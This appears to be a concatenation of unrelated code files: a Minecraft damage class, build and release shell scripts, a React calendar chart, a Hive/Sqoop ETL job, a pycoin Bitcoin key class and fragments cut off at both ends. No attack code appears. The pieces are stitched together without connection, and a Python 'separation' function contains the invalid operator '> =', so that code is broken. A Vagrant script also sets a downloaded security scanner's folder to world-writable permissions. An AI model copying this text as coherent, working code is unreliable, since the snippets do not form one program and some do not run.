partialSum( arr1 )=[ 1, 7, 12, 6, 5, 10 ]: [ 1, 8, 20, 26, 31, 41 ]
------------------------------------------------partialSum------------------------------------------------
------------------------------------------------partSum------------------------------------------------
partSum(arr)=[ 1, 1, 5, 2, 6, 10 ]: [ 2, 7, 9, 15, 25 ]
partSum(arr1)=[ 1, 7, 12, 6, 5, 10 ]: [ 8, 20, 26, 31, 41 ]
------------------------------------------------partSum------------------------------------------------
------------------------------------------------rPartSumArr------------------------------------------------
rPartSumsArr(arr)=[ 1, 1, 5, 2, 6, 10 ]: [ 10, 16, 18, 23, 24, 25 ]
rPartSumsArr(arr1)=[ 1, 7, 12, 6, 5, 10 ]: [ 10, 15, 21, 33, 40, 41 ]
------------------------------------------------rPartSumArr------------------------------------------------
*/
|
<gh_stars>10-100
package chylex.hee.system.abstractions.damage.source;
import net.minecraft.util.DamageSource;
public class DamagedBy extends DamageSource{
public DamagedBy(String sourceName){
super(sourceName);
}
@Override
public boolean isDamageAbsolute(){
return true;
}
@Override
public boolean isUnblockable(){
return true;
}
@Override
public boolean isDifficultyScaled(){
return false;
}
}
|
#!/usr/bin/env bash
# Run with argument `--skip-checks` to skip checks for clean build and removing install dir.
# exit on any error
set -e
# This script will
# 1. build and install the source,
# 2. run doxygen and create html and xml docs,
# 3. run script to generate markdown from xml
echo "Generating docs"
command -v doxygen >/dev/null 2>&1 || { echo "ERROR: 'doxygen' is required and was not found!"; exit 1; }
# Get current directory of script.
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
skip_checks=false
if [ "$#" -eq 1 -a "$1" == "--skip-checks" ]; then
skip_checks=true
fi
BUILD_DIR="${SCRIPT_DIR}/docs"
INSTALL_DIR="${BUILD_DIR}/install"
if [ "$skip_checks" = false ]; then
if [ -d ${BUILD_DIR} ] ; then
printf "\"${BUILD_DIR}\" already exists! Aborting...\n"
exit 1
fi
fi
# Build and install locally.
cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_INSTALL_PREFIX=${INSTALL_DIR} -B${BUILD_DIR} -H.;
make -C${BUILD_DIR} install -j4;
return_result=0
# Doxygen likes to run where the source is (because INPUT in .doxygen is empty),
# so we cd there.
pushd ${INSTALL_DIR}/include/mavsdk
# If any warnings are thrown, we should not flag this as a success.
doxygen_output_file=".doxygen_output.tmp"
doxygen ${SCRIPT_DIR}/.doxygen &> $doxygen_output_file
cat $doxygen_output_file
if cat $doxygen_output_file | grep "warning" | grep -v "ignoring unsupported tag"
then
return_result=1
echo "Please check doxygen warnings."
fi
# TODO (Jonas): is there a reason for generating markdown if doxygen failed above?
${SCRIPT_DIR}/generate_markdown_from_doxygen_xml.py ${INSTALL_DIR}/docs ${INSTALL_DIR}/docs
popd
exit $return_result
|
<reponame>VOLTTRON/volttron-AIRCx-visualization<gh_stars>1-10
// Copyright (c) 2020, Battelle Memorial Institute
// All rights reserved.
// 1. Battelle Memorial Institute (hereinafter Battelle) hereby grants
// permission to any person or entity lawfully obtaining a copy of this
// software and associated documentation files (hereinafter "the Software")
// to redistribute and use the Software in source and binary forms, with or
// without modification. Such person or entity may use, copy, modify, merge,
// publish, distribute, sublicense, and/or sell copies of the Software, and
// may permit others to do so, subject to the following conditions:
// - Redistributions of source code must retain the above copyright notice,
// this list of conditions and the following disclaimers.
// - Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
// - Other than as used herein, neither the name Battelle Memorial Institute
// or Battelle may be used in any form whatsoever without the express
// written consent of Battelle.
// 2. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL BATTELLE OR CONTRIBUTORS BE LIABLE FOR
// ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
// DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
// CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
// LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
// OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
// DAMAGE.
// The views and conclusions contained in the software and documentation are those
// of the authors and should not be interpreted as representing official policies,
// either expressed or implied, of the FreeBSD Project.
// This material was prepared as an account of work sponsored by an agency of the
// United States Government. Neither the United States Government nor the United
// States Department of Energy, nor Battelle, nor any of their employees, nor any
// jurisdiction or organization that has cooperated in the development of these
// materials, makes any warranty, express or implied, or assumes any legal
// liability or responsibility for the accuracy, completeness, or usefulness or
// any information, apparatus, product, software, or process disclosed, or
// represents that its use would not infringe privately owned rights.
// Reference herein to any specific commercial product, process, or service by
// trade name, trademark, manufacturer, or otherwise does not necessarily
// constitute or imply its endorsement, recommendation, or favoring by the
// United States Government or any agency thereof, or Battelle Memorial Institute.
// The views and opinions of authors expressed herein do not necessarily state or
// reflect those of the United States Government or any agency thereof.
// PACIFIC NORTHWEST NATIONAL LABORATORY
// operated by
// BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
// under Contract DE-AC05-76RL01830
import { ButtonBase, Paper, Tooltip, Typography } from "@material-ui/core";
import { withStyles } from "@material-ui/core/styles";
import clsx from "clsx";
import filters from "constants/filters";
import groups from "constants/groups";
import { white } from "constants/palette";
import {
fetchDetailed,
selectDetailed,
selectDetailedBusy,
selectDetailedRequest,
selectSources,
} from "controllers/data/action";
import _ from "lodash";
import moment from "moment";
import React from "react";
import { connect } from "react-redux";
import Popup from "./Popup";
import styles from "./styles";
class Graph extends React.Component {
constructor(props) {
super(props);
const { form } = props;
const group = groups.parse(_.get(form, "group", "day"));
const time = moment(_.get(form, "date"));
const noData = filters.parse("no-data");
const outsideRange = filters.parse("outside-range");
const start = moment(props.start);
const end = moment(props.end);
const range = {
start: start.clone(),
end: end.clone(),
};
switch (group.name) {
case "month":
range.start = moment.max(
range.start,
time
.clone()
.startOf("month")
.startOf("day")
);
range.end = moment.min(
range.end,
time
.clone()
.endOf("month")
.endOf("day")
);
break;
case "week":
range.start = moment.max(
range.start,
time
.clone()
.startOf("week")
.startOf("day")
);
range.end = moment.min(
range.end,
time
.clone()
.endOf("week")
.endOf("day")
);
break;
case "day":
range.start = time.clone().startOf("day");
range.end = time.clone().endOf("day");
break;
default:
// no need to handle all cases
}
const pad = moment.min(
end
.clone()
.date(1)
.subtract(11, "month"),
end
.clone()
.subtract(1, "year")
.add(1, "day")
);
const months = [
{
name: pad.format("MMM"),
label: pad.format("MMM").slice(0, 1),
month: pad.month(),
year: pad.year(),
tooltip: pad.format("MMMM YYYY"),
},
];
const base = [];
while (pad.isBefore(end)) {
const month = months[months.length - 1];
base.push({
path: [`${month.year}`, `${month.month}`, `${pad.date()}`],
x: months.length,
y: pad.date(),
size: 10,
color: pad.isBefore(start) ? outsideRange.color : noData.color,
date: pad.isBefore(start) ? null : pad.clone(),
selected: pad.isBetween(range.start, range.end, "hour", true),
tooltip: pad.format("MMMM Do YYYY"),
});
pad.add(1, "day");
if (months[months.length - 1].month !== pad.month()) {
months.push({
name: pad.format("MMM"),
label: pad.format("MMM").slice(0, 1),
month: pad.month(),
year: pad.year(),
tooltip: pad.format("MMMM YYYY"),
});
}
}
const month = months[months.length - 1];
base.push({
path: [`${month.year}`, `${month.month}`, `${pad.date()}`],
x: months.length,
y: pad.date(),
size: 10,
color: pad.isBefore(start) ? outsideRange.color : noData.color,
date: pad.clone(),
selected: pad.isBetween(range.start, range.end, "hour", true),
tooltip: pad.format("MMMM Do YYYY"),
});
this.state = {
start: moment(props.start),
end: moment(props.end),
months: months,
base: base,
temp: [],
show: null,
};
}
isPrevious = () => {
const { show, start } = this.state;
if (show) {
return !show.date.isSame(start, "day");
}
};
isNext = () => {
const { show, end } = this.state;
if (show) {
return !show.date.isSame(end, "day");
}
};
handleValueClick = (value) => {
const { current, sources } = this.props;
if (value.date) {
const { site, building, device, diagnostic } = current;
const topic = Object.values(
_.get(sources, [diagnostic, site, building, device], {})
);
this.setState({ show: value });
this.props.fetchDetailed(
_.merge({}, current, {
start: value.date
.clone()
.startOf("day")
.format(),
end: value.date
.clone()
.endOf("day")
.format(),
topic: topic,
})
);
}
};
handleValuePrevious = () => {
const { current, sources } = this.props;
const { base, months, show } = this.state;
if (this.isPrevious()) {
const { site, building, device, diagnostic } = current;
const topic = Object.values(
_.get(sources, [diagnostic, site, building, device], {})
);
const date = show.date.clone().subtract("day", 1);
const mark = _.find(base, {
x: _.findIndex(months, { month: date.month(), year: date.year() }) + 1,
y: date.date(),
});
this.setState({ show: mark });
this.props.fetchDetailed(
_.merge({}, current, {
start: date
.clone()
.startOf("day")
.format(),
end: date
.clone()
.endOf("day")
.format(),
topic: topic,
})
);
}
};
handleValueNext = () => {
const { current, sources } = this.props;
const { base, months, show } = this.state;
if (this.isNext()) {
const { site, building, device, diagnostic } = current;
const topic = Object.values(
_.get(sources, [diagnostic, site, building, device], {})
);
const date = show.date.clone().add("day", 1);
const mark = _.find(base, {
x: _.findIndex(months, { month: date.month(), year: date.year() }) + 1,
y: date.date(),
});
this.setState({ show: mark });
this.props.fetchDetailed(
_.merge({}, current, {
start: date
.clone()
.startOf("day")
.format(),
end: date
.clone()
.endOf("day")
.format(),
topic: topic,
})
);
}
};
handleClose = () => {
this.setState({ show: null });
};
renderHeader() {
const { classes } = this.props;
const { months } = this.state;
return (
<React.Fragment>
<div className={classes.monthsTitle}>
<span className={classes.month}>
<strong>Month</strong>
</span>
</div>
<div className={classes.months} style={{ width: months.length * 19 }}>
{months.map((m) => (
<Tooltip
key={`tooltip-${m.year}-${m.month}`}
title={m.tooltip}
placement="top"
>
<span
key={`month-${m.year}-${m.month}`}
className={classes.month}
>
<strong>{m.label}</strong>
</span>
</Tooltip>
))}
</div>
</React.Fragment>
);
}
renderChart() {
const { classes, data, form } = this.props;
const { base, months } = this.state;
const likely = filters.parse("likely");
const sensitivity = _.get(form, "sensitivity", "normal");
const filter = filters.parse(form.filter);
const outsideRange = filters.parse("outside-range");
const marks = base.map((item) => {
let temp = {};
if (item.color !== outsideRange.color) {
const values = Object.values(_.get(data, item.path, {}))
.reduce((p, v) => p.concat(v), [])
.filter((v) => {
const t = filter.isType(v[sensitivity]);
return t;
})
.map((v) => ({
filter: filters.getType(v[sensitivity]),
value: v[sensitivity],
}));
if (filter === likely) {
const errors = _.filter(values, { filter: filters.parse("fault") })
.length;
const passed = _.filter(values, { filter: filters.parse("okay") })
.length;
const aggregate = filters.aggregate(errors, passed);
temp = { color: aggregate.color, value: 0 };
} else {
for (let index = 0; index < filters.values.length; index++) {
const filter = filters.values[index];
const value = _.find(values, { filter });
if (value) {
temp = { color: filter.color, value: value };
break;
}
}
}
}
return _.merge({}, item, temp);
});
return (
<div className={classes.chart} style={{ width: months.length * 19 + 4 }}>
{marks.map((mark, index) => (
<React.Fragment key={`fragment-${mark.x}-${mark.y}`}>
{mark.selected && (
<div
key={`selected-${mark.x}-${mark.y}`}
className={classes.selected}
style={{
left: mark.x * 19 - 20,
top: mark.y * 21 - 20,
height:
_.get(marks, [index + 1, "selected"], false) &&
_.get(marks, [index + 1, "path", "1"]) === mark.path[1]
? "44px"
: "24px",
}}
/>
)}
<Tooltip
key={`tooltip-${mark.tooltip}`}
title={mark.tooltip}
placement="top"
>
<ButtonBase
key={`mark-${mark.x}-${mark.y}`}
className={clsx(
classes.mark,
Boolean(mark.date) && classes.hover
)}
style={{
left: mark.x * 19 - 14,
top: mark.y * 21 - 14,
background: mark.color,
}}
onClick={() => this.handleValueClick(mark)}
/>
</Tooltip>
</React.Fragment>
))}
</div>
);
}
renderTitle() {
const { classes, label } = this.props;
const { months } = this.state;
return (
<div className={classes.footer} style={{ width: months.length * 19 + 4 }}>
<Typography className={classes.footerLabel} variant="body1">
<strong>{_.replace(label, / Dx$/i, "")}</strong>
</Typography>
</div>
);
}
renderFooter() {
const { classes } = this.props;
return <div className={classes.footer} style={{ height: "25px" }} />;
}
render() {
const {
classes,
form,
current,
data,
detailed,
busy,
request,
label,
} = this.props;
const { show } = this.state;
return (
<Paper className={classes.paper} color={white} elevation={3}>
{this.renderTitle()}
{this.renderHeader()}
{this.renderChart()}
{this.renderFooter()}
{show && (
<Popup
form={form}
current={current}
path={_.concat([label], show.path)}
data={_.merge({}, show, {
diagnostic: _.get(data, show.path, {}),
detailed: detailed,
busy: busy,
})}
request={request}
onClose={this.handleClose}
isNext={this.isNext()}
isPrevious={this.isPrevious()}
onNext={this.handleValueNext}
onPrevious={this.handleValuePrevious}
/>
)}
</Paper>
);
}
}
const mapStateToProps = (state) => ({
detailed: selectDetailed(state),
busy: selectDetailedBusy(state),
request: selectDetailedRequest(state),
sources: selectSources(state),
});
const mapActionToProps = { fetchDetailed };
export default connect(
mapStateToProps,
mapActionToProps
)(withStyles(styles)(Graph));
|
from pydantic import BaseModel, Field
class HealthModel(BaseModel):
status: str = Field(...)
version: str = Field(...)
db_ping: str = Field(...)
class Config:
allow_population_by_field_name = True
arbitrary_types_allowed = True
schema_extra = {
'example': {
'status': 'OK',
'version': '0.1.0',
'db_ping': 'pong',
}
} |
package com.darian.springbootjmx.dynamicBean;
import javax.management.DynamicMBean;
import javax.management.MBeanServer;
import javax.management.ObjectName;
import javax.management.StandardMBean;
import java.lang.management.ManagementFactory;
public class DynamicBeanServer {
public static void main(String[] args) throws Exception {
MBeanServer mBeanServer = ManagementFactory.getPlatformMBeanServer();
ObjectName objectName = new ObjectName("com.darian.springbootjmx.dynamicBean:type=Data");
Data data = new DefaultData();
DynamicMBean dynamicMBean = new StandardMBean(data, Data.class);
mBeanServer.registerMBean(dynamicMBean, objectName);
System.out.println("DynamicBeanServer start ......");
Thread.sleep(Long.MAX_VALUE);
}
}
|
#!/bin/bash
# Copyright 2014 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Pushes an official release to our official release location
set -o errexit
set -o nounset
set -o pipefail
KUBE_RELEASE_VERSION=${1-}
VERSION_REGEX="^v(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)$"
[[ ${KUBE_RELEASE_VERSION} =~ $VERSION_REGEX ]] || {
echo "!!! You must specify the version you are releasing in the form of '$VERSION_REGEX'" >&2
exit 1
}
KUBE_GCS_NO_CACHING=n
KUBE_GCS_MAKE_PUBLIC=y
KUBE_GCS_UPLOAD_RELEASE=y
KUBE_GCS_RELEASE_BUCKET=kubernetes-release
KUBE_GCS_RELEASE_PREFIX=release/${KUBE_RELEASE_VERSION}
KUBE_GCS_LATEST_FILE="release/latest.txt"
KUBE_GCS_LATEST_CONTENTS=${KUBE_RELEASE_VERSION}
KUBE_ROOT=$(dirname "${BASH_SOURCE}")/..
source "$KUBE_ROOT/build/common.sh"
kube::release::gcs::release
kube::release::gcs::publish_latest_official
|
#!/bin/sh
cd `dirname $0`
source ./../config.sh
exec_dir major_number_of_training_bases
HIVE_DB=assurance
HIVE_TABLE=major_number_of_training_bases
TARGET_TABLE=im_quality_major_data_info
DATA_NAME=实训基地数量
DATA_NO=ZY_SXJDSL
function create_table() {
hadoop fs -rm -r ${BASE_HIVE_DIR}/${HIVE_DB}/${HIVE_TABLE} || :
hive -e "DROP TABLE IF EXISTS ${HIVE_DB}.${HIVE_TABLE};"
hive -e "CREATE EXTERNAL TABLE IF NOT EXISTS ${HIVE_DB}.${HIVE_TABLE}(
data_no String comment '数据项编号',
data_name String comment '数据项名称',
major_no String comment '专业编号',
major_name String comment '专业名称',
data_cycle String comment '数据统计周期 YEAR 年 MONTH 月 DAY 日 QUARTER 季度 OTHER 其他',
data_type String comment '数据类型 NUMBER 数值类型 ENUM 枚举类型',
data_time String comment '数据日期 年YYYY 月YYYYmm 日YYYYMMDD 季度YYYY-1,yyyy-2,yyyy-3,yyyy-4 学期 yyyy-yyyy 学期 yyyy-yyyy-1,yyyy-yyyy-2',
data_value String comment '数据项值(数字保存数字,如果是数据字典枚举保存key)',
is_new String comment '是否最新 是YES 否NO',
create_time String comment '创建时间'
) COMMENT '实训基地数量'
LOCATION '${BASE_HIVE_DIR}/${HIVE_DB}/${HIVE_TABLE}'"
fn_log "创建表——实训基地数量:${HIVE_DB}.${HIVE_TABLE}"
}
function import_table() {
hive -e "
INSERT INTO TABLE ${HIVE_DB}.${HIVE_TABLE}
select
c.data_no as data_no,
c.data_name as data_name,
a.major_code as major_no,
a.major_name as major_name,
c.data_cycle as data_cycle,
c.data_type as data_type,
a.semester_year as data_time,
a.t_count as data_value,
'NO' as is_new,
FROM_UNIXTIME(UNIX_TIMESTAMP()) AS create_time
from
(
select
count(training_base_id) as t_count,
t.major_code,
t.major_name,
t.semester_year
from model.major_trainingRoom_detailed t
where t.major_code!=''
group by t.major_code,
t.major_name,
t.semester_year
) a,
assurance.im_quality_data_base_info c where c.data_name ='${DATA_NAME}'
"
fn_log "导入数据 —— 实训基地数量:${HIVE_DB}.${HIVE_TABLE}"
}
#插入新数据
function import_table_new() {
hive -e "
INSERT INTO TABLE ${HIVE_DB}.${HIVE_TABLE}
select
c.data_no as data_no,
c.data_name as data_name,
a.major_code as major_no,
a.major_name as major_name,
c.data_cycle as data_cycle,
c.data_type as data_type,
a.semester_year as data_time,
a.t_count as data_value,
'NO' as is_new,
FROM_UNIXTIME(UNIX_TIMESTAMP()) AS create_time
from
(
select
count(training_base_id) as t_count,
t.major_code,
t.major_name,
t.semester_year
from model.major_trainingRoom_detailed t
where t.semester_year in
(select max(s.semester_year) from model.major_trainingRoom_detailed s)
group by t.major_code,
t.major_name,
t.semester_year
) a,
assurance.im_quality_data_base_info c where c.data_name ='${DATA_NAME}'
"
fn_log "导入数据 —— 实训基地数量:${HIVE_DB}.${HIVE_TABLE}"
}
function export_table() {
DATE_TIME=`hive -e "select max(data_time) from ${HIVE_DB}.${HIVE_TABLE} " `
clear_mysql_data "delete from im_quality_major_data_info where data_name = '${DATA_NAME}';"
sqoop export --connect ${MYSQL_URL} --username ${MYSQL_USERNAME} --password ${MYSQL_PASSWORD} \
--table ${TARGET_TABLE} --export-dir ${BASE_HIVE_DIR}/${HIVE_DB}/${HIVE_TABLE} \
--input-fields-terminated-by '\0001' --input-null-string '\\N' --input-null-non-string '\\N' \
--null-string '\\N' --null-non-string '\\N' \
--columns 'data_no,data_name,major_no,major_name,data_cycle,data_type,data_time,data_value,is_new,create_time'
clear_mysql_data "update assurance.im_quality_major_data_info set is_new = 'NO' where data_name = '${DATA_NAME}';"
clear_mysql_data "update assurance.im_quality_major_data_info set is_new = 'YES' where data_name = '${DATA_NAME}' and data_time='${DATE_TIME}'"
fn_log "导出数据--实训基地数量:${HIVE_DB}.${TARGET_TABLE}"
}
function export_table_new() {
DATE_TIME=`hive -e "select max(data_time) from ${HIVE_DB}.${HIVE_TABLE} " `
clear_mysql_data "delete from im_quality_major_data_info
where data_no = '${DATA_NO}' and data_time= '${DATE_TIME}';"
sqoop export --connect ${MYSQL_URL} --username ${MYSQL_USERNAME} --password ${MYSQL_PASSWORD} \
--table ${TARGET_TABLE} --export-dir ${BASE_HIVE_DIR}/${HIVE_DB}/${HIVE_TABLE} \
--input-fields-terminated-by '\0001' --input-null-string '\\N' --input-null-non-string '\\N' \
--null-string '\\N' --null-non-string '\\N' \
--columns 'data_no,data_name,major_no,major_name,data_cycle,data_type,data_time,data_value,is_new,create_time'
clear_mysql_data "update assurance.im_quality_major_data_info set is_new = 'NO' where data_no = '${DATA_NO}';"
clear_mysql_data "update assurance.im_quality_major_data_info set is_new = 'YES' where data_no = '${DATA_NO}' and data_time= '${DATE_TIME}' "
fn_log "导出数据--实训基地数量:${HIVE_DB}.${TARGET_TABLE}"
}
create_table
import_table
export_table |
def separation(data):
x1, x2, x3 = [], [], []
for p in data:
x1.append(p[0])
x2.append(p[1])
x3.append(p[2])
min_x1 = min(x1)
min_x2 = min(x2)
datapoints_class_0 = []
datapoints_class_1 = []
for p in data:
if p[0] > = min_x1 and p[1] > = min_x2:
datapoints_class_1.append(p)
else:
datapoints_class_0.append(p)
return datapoints_class_0, datapoints_class_1 |
import fetchWrap from '@/utils/fetch';
export const getForestBoundary = async ({ lat, lng }) => {
const data = await fetchWrap({
url: `/api/v1/forest-compartment-boundary?decimalLongitude=${lng}&decimalLatitude=${lat}&size=10`,
method: 'GET',
});
return data;
};
|
package adapter
func Example_one() {
video := VideoOutputter{}
video.Start()
screen := Screen{}
// VDI port is incompatible with HDMI port, so the
// following statement would cause a compile error:
//
// screen.SetInput(video.GetOutput())
//
// To solve this problem, we need to use an adapter.
adapter := HDMI2DVIAdapter{}
adapter.SetInput(video.GetOutput())
screen.SetInput(adapter.GetOutput())
screen.Play()
// Output:
// 0123456789
}
|
#!/bin/bash
# This file contains functions used by other bash scripts in this directory.
# This function echoes the command given by $1 (cmd), then executes it.
# However, if $2 (dryrun) is non-zero, then it only does the echo, not the execution.
# Usage: do_cmd cmd dryrun
# Returns 0 on success, non-zero on failure; if there is an error, the error string is echoed.
function do_cmd {
if [[ $# -ne 2 ]]; then
echo "ERROR in do_cmd: wrong number of arguments: expected 2, received $#"
exit 1
fi
local cmd=$1
local dryrun=$2
echo $cmd
if [ $dryrun -eq 0 ]; then
# We use 'eval $cmd' rather than just '$cmd', because the
# latter doesn't work right if the command contains any quoted
# strings (e.g., svn ci -m "this is my message")
eval $cmd
if [ $? -ne 0 ]; then
echo "ERROR in do_cmd: error executing command"
exit 2
fi
fi
return 0
}
# make sure that the given file name argument was provided, and that
# the file exists; exit the script with a usage message if either of
# these is not true
#
# Usage: check_file_arg filename_arg description
# (description is echoed if there is an error)
# Example: check_file_arg "$input_file" "input"
# (note that $input_file must be in quotes)
function check_file_arg {
local filename=$1
local description=$2
if [ -z "$filename" ]; then
echo "ERROR: Must specify $description file"
Usage
exit 1
fi
if [ ! -f $filename ]; then
echo "ERROR: Can't find $description file: $filename"
Usage
exit 1
fi
}
|
#!/usr/bin/env bats
load ../helpers
function teardown() {
swarm_manage_cleanup
stop_docker
}
# FIXME
@test "docker logout" {
skip
}
|
/**
* Clone interface.
*/
export interface IClone {
/**
* Clone and return object.
* @returns Clone object
*/
clone(): Object;
/**
* Clone to the target object.
* @param target - Target object
*/
cloneTo(target: Object): Object;
}
|
#!/bin/bash
apt-get install -y ruby
cd /home/vagrant
wget https://github.com/Arachni/arachni/releases/download/v1.4/arachni-1.4-0.5.10-linux-x86_64.tar.gz
tar xfvz arachni-1.4-0.5.10-linux-x86_64.tar.gz
chmod -R 777 /home/vagrant/arachni-1.4-0.5.10
|
.text-format {
font-family: Arial, sans-serif;
font-size: 18px;
color: #00ff00;
} |
<gh_stars>0
from pycoin import ecdsa
from pycoin.key.validate import netcode_and_type_for_data
from pycoin.networks import address_prefix_for_netcode, wif_prefix_for_netcode
from pycoin.encoding import a2b_hashed_base58, secret_exponent_to_wif,\
public_pair_to_sec, hash160,\
hash160_sec_to_bitcoin_address, sec_to_public_pair,\
is_sec_compressed, from_bytes_32, EncodingError
from .bip32 import Wallet
class Key(object):
def __init__(self, hierarchical_wallet=None, secret_exponent=None, public_pair=None, hash160=None,
prefer_uncompressed=None, is_compressed=True, netcode='BTC'):
"""
hierarchical_wallet:
a bip32 wallet
secret_exponent:
a long representing the secret exponent
public_pair:
a tuple of long integers on the ecdsa curve
hash160:
a hash160 value corresponding to a bitcoin address
Include at most one of hierarchical_wallet, secret_exponent, public_pair or hash160.
prefer_uncompressed, is_compressed (booleans) are optional.
netcode:
the code for the network (as defined in pycoin.networks)
"""
if [hierarchical_wallet, secret_exponent, public_pair, hash160].count(None) != 3:
raise ValueError("exactly one of hierarchical_wallet, secret_exponent, public_pair, hash160"
" must be passed.")
if prefer_uncompressed is None:
prefer_uncompressed = not is_compressed
self._prefer_uncompressed = prefer_uncompressed
self._hierarchical_wallet = hierarchical_wallet
self._secret_exponent = secret_exponent
self._public_pair = public_pair
if hash160:
if is_compressed:
self._hash160_compressed = hash160
else:
self._hash160_uncompressed = hash160
self._netcode = netcode
self._calculate_all()
@classmethod
def from_text(class_, text, is_compressed=True):
"""
This function will accept a BIP0032 wallet string, a WIF, or a bitcoin address.
The "is_compressed" parameter is ignored unless a public address is passed in.
"""
data = a2b_hashed_base58(text)
netcode, key_type = netcode_and_type_for_data(data)
data = data[1:]
if key_type in ("pub32", "prv32"):
hw = Wallet.from_wallet_key(text)
return Key(hierarchical_wallet=hw, netcode=netcode)
if key_type == 'wif':
is_compressed = (len(data) > 32)
if is_compressed:
data = data[:-1]
return Key(
secret_exponent=from_bytes_32(data),
prefer_uncompressed=not is_compressed, netcode=netcode)
if key_type == 'address':
return Key(hash160=data, is_compressed=is_compressed, netcode=netcode)
raise EncodingError("unknown text: %s" % text)
@classmethod
def from_sec(class_, sec):
"""
Create a key from an sec bytestream (which is an encoding of a public pair).
"""
public_pair = sec_to_public_pair(sec)
return Key(public_pair=public_pair, prefer_uncompressed=not is_sec_compressed(sec))
def public_copy(self):
"""
Create a copy of this key with private key information removed.
"""
if self._hierarchical_wallet:
return Key(hierarchical_wallet=self._hierarchical_wallet.public_copy())
if self.public_pair():
return Key(public_pair=self.public_pair())
return self
def _calculate_all(self):
for attr in "_secret_exponent _public_pair _wif_uncompressed _wif_compressed _sec_compressed" \
" _sec_uncompressed _hash160_compressed _hash160_uncompressed _address_compressed" \
" _address_uncompressed _netcode".split():
setattr(self, attr, getattr(self, attr, None))
if self._hierarchical_wallet:
if self._hierarchical_wallet.is_private:
self._secret_exponent = self._hierarchical_wallet.secret_exponent
else:
self._public_pair = self._hierarchical_wallet.public_pair
self._netcode = self._hierarchical_wallet.netcode
wif_prefix = wif_prefix_for_netcode(self._netcode)
if self._secret_exponent:
self._wif_uncompressed = secret_exponent_to_wif(
self._secret_exponent, compressed=False, wif_prefix=wif_prefix)
self._wif_compressed = secret_exponent_to_wif(
self._secret_exponent, compressed=True, wif_prefix=wif_prefix)
self._public_pair = ecdsa.public_pair_for_secret_exponent(
ecdsa.generator_secp256k1, self._secret_exponent)
if self._public_pair:
self._sec_compressed = public_pair_to_sec(self._public_pair, compressed=True)
self._sec_uncompressed = public_pair_to_sec(self._public_pair, compressed=False)
self._hash160_compressed = hash160(self._sec_compressed)
self._hash160_uncompressed = hash160(self._sec_uncompressed)
address_prefix = address_prefix_for_netcode(self._netcode)
if self._hash160_compressed:
self._address_compressed = hash160_sec_to_bitcoin_address(
self._hash160_compressed, address_prefix=address_prefix)
if self._hash160_uncompressed:
self._address_uncompressed = hash160_sec_to_bitcoin_address(
self._hash160_uncompressed, address_prefix=address_prefix)
def as_text(self):
"""
Return a textual representation of this key.
"""
if self._hierarchical_wallet:
return self._hierarchical_wallet.wallet_key(as_private=self._hierarchical_wallet.is_private)
if self._secret_exponent:
return self.wif()
return self.address()
def hierarchical_wallet(self):
return self._hierarchical_wallet
def hwif(self, as_private=False):
"""
Return a textual representation of the hiearachical wallet (reduced to public), or None.
"""
if self._hierarchical_wallet:
return self._hierarchical_wallet.wallet_key(as_private=as_private)
return None
def secret_exponent(self):
"""
Return an integer representing the secret exponent (or None).
"""
return self._secret_exponent
def public_pair(self):
"""
Return a pair of integers representing the public key (or None).
"""
return self._public_pair
def _use_uncompressed(self, use_uncompressed):
if use_uncompressed:
return use_uncompressed
if use_uncompressed is None:
return self._prefer_uncompressed
return False
def wif(self, use_uncompressed=None):
"""
Return the WIF representation of this key, if available.
If use_uncompressed is not set, the preferred representation is returned.
"""
if self._use_uncompressed(use_uncompressed):
return self._wif_uncompressed
return self._wif_compressed
def sec(self, use_uncompressed=None):
"""
Return the SEC representation of this key, if available.
If use_uncompressed is not set, the preferred representation is returned.
"""
if self._use_uncompressed(use_uncompressed):
return self._sec_uncompressed
return self._sec_compressed
def hash160(self, use_uncompressed=None):
"""
Return the hash160 representation of this key, if available.
If use_uncompressed is not set, the preferred representation is returned.
"""
if self._use_uncompressed(use_uncompressed):
return self._hash160_uncompressed
return self._hash160_compressed
def address(self, use_uncompressed=None):
"""
Return the public address representation of this key, if available.
If use_uncompressed is not set, the preferred representation is returned.
"""
if self._use_uncompressed(use_uncompressed):
return self._address_uncompressed
return self._address_compressed
def subkey(self, path_to_subkey):
"""
Return the Key corresponding to the hierarchical wallet's subkey (or None).
"""
if self._hierarchical_wallet:
return Key(hierarchical_wallet=self._hierarchical_wallet.subkey_for_path(str(path_to_subkey)))
def subkeys(self, path_to_subkeys):
"""
Return an iterator yielding Keys corresponding to the
hierarchical wallet's subkey path (or just this key).
"""
if self._hierarchical_wallet:
for subwallet in self._hierarchical_wallet.subkeys_for_path(path_to_subkeys):
yield Key(hierarchical_wallet=subwallet)
else:
yield self
|
<reponame>JarredStanford/JarredStanford.github.io<gh_stars>0
var __extends = (this && this.__extends) || (function () {
var extendStatics = function (d, b) {
extendStatics = Object.setPrototypeOf ||
({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) ||
